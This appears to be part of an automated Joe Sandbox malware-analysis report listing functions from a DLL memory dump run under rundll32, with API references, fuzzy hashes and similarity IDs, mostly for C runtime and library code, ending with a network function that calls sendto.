Opcode Fuzzy Hash: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
Instruction Fuzzy Hash: 6201C4B6600224ABEB11DB64AEC4BDA77BCEB56750F410062FA05D3141DA709E8487A4

Uniqueness

Uniqueness Score: -1.00%

Function 1003303D, Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 10033049

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__amsg_exit.LIBCMT ref: 10033069
__lock.LIBCMT ref: 10033079
InterlockedDecrement.KERNEL32(?), ref: 10033096
InterlockedIncrement.KERNEL32(042F1628), ref: 100330C1

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
Instruction ID: 0569f5a3ac8da4acb0d1a986d046cd977373cb471ce5986ef029c0716cf573c4
Opcode Fuzzy Hash: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
Instruction Fuzzy Hash: 6701AD35E01B61AFE716DB68889675E77A0FF01BA2F018205F910AF3A1CB347850CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 10043707, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 1004370E
_Fputc.LIBCPMT ref: 10043762
_Fputc.LIBCPMT ref: 10043890

Strings

, xrefs: 1004381A

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Fputc$H_prolog3_
String ID:
API String ID: 2569218679-3916222277
Opcode ID: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
Instruction ID: 327ff4da5823006f03605dc28747a7ba7b3d1cf190d8e7353a19ee1d8cd02c88
Opcode Fuzzy Hash: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
Instruction Fuzzy Hash: 74515CB6A046489BCB29CBA4C8919DEB7B5EF48310F31D539F552E7291EF70B808CB54

Uniqueness

Uniqueness Score: -1.00%

Function 10028683, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714

Part of subcall function 1002ACFB: __EH_prolog3_catch.LIBCMT ref: 1002AD02

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

GetProcAddress.KERNEL32(00000000,HtmlHelpA,10027AEC,0000000C), ref: 100286CC
FreeLibrary.KERNEL32(?), ref: 100286DC

Strings

hhctrl.ocx, xrefs: 100286B0
HtmlHelpA, xrefs: 100286C6

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 3274081130-63838506
Opcode ID: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
Instruction ID: 005129d9915a41a8e27983cdb1c3ef0c0b08f3353e048253c6f2f10206dc3ba7
Opcode Fuzzy Hash: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
Instruction Fuzzy Hash: 7D01AD39001A07ABD722DB60FD09B4B3BD4EF04751F90882AFA5AA5462DB70E9509B59

Uniqueness

Uniqueness Score: -1.00%

Function 10037AE5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 10037AF8

Part of subcall function 10037A53: ___BuildCatchObjectHelper.LIBCMT ref: 10037A89

_UnwindNestedFrames.LIBCMT ref: 10037B0F
___FrameUnwindToState.LIBCMT ref: 10037B1D

Strings

csm, xrefs: 10037AF4, 10037B09, 10037B1C, 10037B3A, 10037B4A

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: f195471c9651215b8799b1dff3133e99b074ac86d89a3ab6fa62fa96ed46b13b
Instruction ID: f623d6fd13c583f27d9dc74078cf60041b57e54907eb0ea25ac4e83ce510980d
Opcode Fuzzy Hash: f195471c9651215b8799b1dff3133e99b074ac86d89a3ab6fa62fa96ed46b13b
Instruction Fuzzy Hash: 1301E475001109BFDF239E51CC41EAB7FAAFF08392F108014BD1C19121D736E9A1EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1003B6EA, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,1003198E), ref: 1003B6EF
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003B6FF

Strings

KERNEL32, xrefs: 1003B6EA
IsProcessorFeaturePresent, xrefs: 1003B6F9

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
Instruction ID: 1963b1661ff3506828beccd1ed570aedb4cc9858b4c3caadb466faf93440aec0
Opcode Fuzzy Hash: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
Instruction Fuzzy Hash: FAF09030D0090DE6EF006BA1AE4A2AF7BB8FB8134AF9204A0E295F0094CF30C074C345

Uniqueness

Uniqueness Score: -1.00%

Function 10003190, Relevance: 6.4, APIs: 5, Instructions: 119COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 100031BF
SetLastError.KERNEL32(0000007F), ref: 100031EB

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
Instruction ID: 4eaf8ab176a3ef0a7f39cefad6a7452b8358f787e5b85b158199dac7f5a3fe15
Opcode Fuzzy Hash: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
Instruction Fuzzy Hash: D051E770E0415ADFEB05CF98C981AAEB7F5FF48344F2085A9E815AB349D734EA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10043370, Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10043377
_fgetc.LIBCMT ref: 100434AD

Part of subcall function 100432DD: std::_String_base::_Xlen.LIBCPMT ref: 100432F3

_memcpy_s.LIBCMT ref: 10043472
_ungetc.LIBCMT ref: 100434F8

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
String ID:
API String ID: 9762108-0
Opcode ID: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
Instruction ID: 13a944e20a8a26727cade03676e391ccd69925211a3dd35b2a339be84363c332
Opcode Fuzzy Hash: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
Instruction Fuzzy Hash: CF515C76A006089FCB15DBB4C8919DEB7B9FF48210F70953AE552E7191EE60F908CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1002B564, Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

__msize.LIBCMT ref: 1002B5F7
__msize.LIBCMT ref: 1002B61A
_malloc.LIBCMT ref: 1002B632
_malloc.LIBCMT ref: 1002B647

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
Instruction ID: c06ad2b89a0fc854e88fd2117b33bcd0e6f9c9f7914c74f6532cfdf5cd9cd5d6
Opcode Fuzzy Hash: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
Instruction Fuzzy Hash: 9D218231600E249FCB55EF30F8C9A5A77E5EF04790BD18519E8598B256DF34ECA0CB80

Uniqueness

Uniqueness Score: -1.00%

Function 100210FF, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 10023B39
__CxxThrowException@8.LIBCMT ref: 10023B55
__CxxThrowException@8.LIBCMT ref: 10023B71
__cftof.LIBCMT ref: 10023B88

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8Throw$__cftof
String ID:
API String ID: 887240167-0
Opcode ID: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
Instruction ID: 16327421f0b36ea26aeda1f7d289ca1428dc81c908886c4e3e3252d19e74a35c
Opcode Fuzzy Hash: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
Instruction Fuzzy Hash: 6201C07980024CBB8B11DE899C46CDF7BEDEA88250BB00152FB19C3501DAB1EE20D2A2

Uniqueness

Uniqueness Score: -1.00%

Function 10023180, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 100231A8
LoadResource.KERNEL32(?,00000000), ref: 100231B0
LockResource.KERNEL32(00000000), ref: 100231C2
FreeResource.KERNEL32(00000000), ref: 10023210

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
Instruction ID: 7117f4333b49b93e9e103224ba76a384f5f6927333c7ffee97ba62033829b48c
Opcode Fuzzy Hash: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
Instruction Fuzzy Hash: 3D110134500761EFD714CF99D988AAAB7F8FF00399F51C429E84283550D770ED58DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100217AE, Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 100217B5

Part of subcall function 1002299D: __EH_prolog3.LIBCMT ref: 100229A4

__strdup.LIBCMT ref: 100217D7
GetCurrentThread.KERNEL32 ref: 10021804
GetCurrentThreadId.KERNEL32 ref: 1002180D

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
Instruction ID: 63c4b4d8ed515ebd67a2d3fac6e93b486822e3c8ffac095a61f99a1b17b282e6
Opcode Fuzzy Hash: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
Instruction Fuzzy Hash: EC217DB8801B408EC321DF6A958124AFBF4FFA4600F50891FE5AAC7A22DBB4A441CF44

Uniqueness

Uniqueness Score: -1.00%

Function 10029178, Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 100291A4
SendMessageA.USER32 ref: 100291CF
GetCapture.USER32 ref: 100291E1
SendMessageA.USER32 ref: 100291F0

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$Capture
String ID:
API String ID: 1665607226-0
Opcode ID: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
Instruction ID: 9d500238946ec194ad8ffa17e766443115c43433aa0eeb43828134f684b4c91a
Opcode Fuzzy Hash: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
Instruction Fuzzy Hash: 8A0175713402557BDA205B629CCDF9B3E7AEBCAF50F510478F6089A0A7CAA14800D620

Uniqueness

Uniqueness Score: -1.00%

Function 1002ABD3, Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 1002AC0E
RegCloseKey.ADVAPI32(00000000), ref: 1002AC17
swprintf.LIBCMT ref: 1002AC34
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002AC45

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWriteswprintf
String ID:
API String ID: 22681860-0
Opcode ID: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
Instruction ID: b3e5ac37a67a2c34724f7244494befea3428c85a23c18ad1ae006fcf60cdee60
Opcode Fuzzy Hash: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
Instruction Fuzzy Hash: C901ED76500218ABDB10DF688D85FAF77ACEB49714F51082AFA01E3141DB74ED0487A8

Uniqueness

Uniqueness Score: -1.00%

Function 10027839, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 10027846
GetTopWindow.USER32(00000000), ref: 10027859

Part of subcall function 10027839: GetWindow.USER32(00000000,00000002), ref: 100278A0

GetTopWindow.USER32(?), ref: 10027889

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
Instruction ID: f10d52d962ac960512d7384eec108a680d17f64428226a36a785d2fcb99e30ea
Opcode Fuzzy Hash: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
Instruction Fuzzy Hash: F301A23618166ABBCB229F51AC08E8F3A99FF417E0F814021FD0C91111DF31D911D6E1

Uniqueness

Uniqueness Score: -1.00%

Function 1003B5D6, Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 1003B5FC

Part of subcall function 1003B421: __fltout2.LIBCMT ref: 1003B44D

__cftog_l.LIBCMT ref: 1003B622
__cftoe_l.LIBCMT ref: 1003B654

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 1693f95a625ffde70028128af171decd196e1ba2c6c978d497889c3db2691634
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 85117E3680054ABFCF139E80CC028EE3F62FB09299F548415FF1958032C736D9B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 1002A257, Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1002A27D
LoadResource.KERNEL32(?,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A289
LockResource.KERNEL32(00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A296
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A2B2

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
Instruction ID: f3c4c51c49c486de2effa8659e681593a38c79611994fd5387b39b2d60b42ad5
Opcode Fuzzy Hash: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
Instruction Fuzzy Hash: B5F0C237200316BBD7019FAD9DC4A6B77ADEF866A17524038FE09D3210DE71DD448AB4

Uniqueness

Uniqueness Score: -1.00%

Function 10001310, Relevance: 6.0, APIs: 4, Instructions: 41networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1000132B
inet_addr.WS2_32(?), ref: 10001340
htons.WS2_32(?), ref: 1000134E
sendto.WS2_32(?,?,?,00000000,?,00000010), ref: 1000136F

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _memsethtonsinet_addrsendto
String ID:
API String ID: 1158618643-0
Opcode ID: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
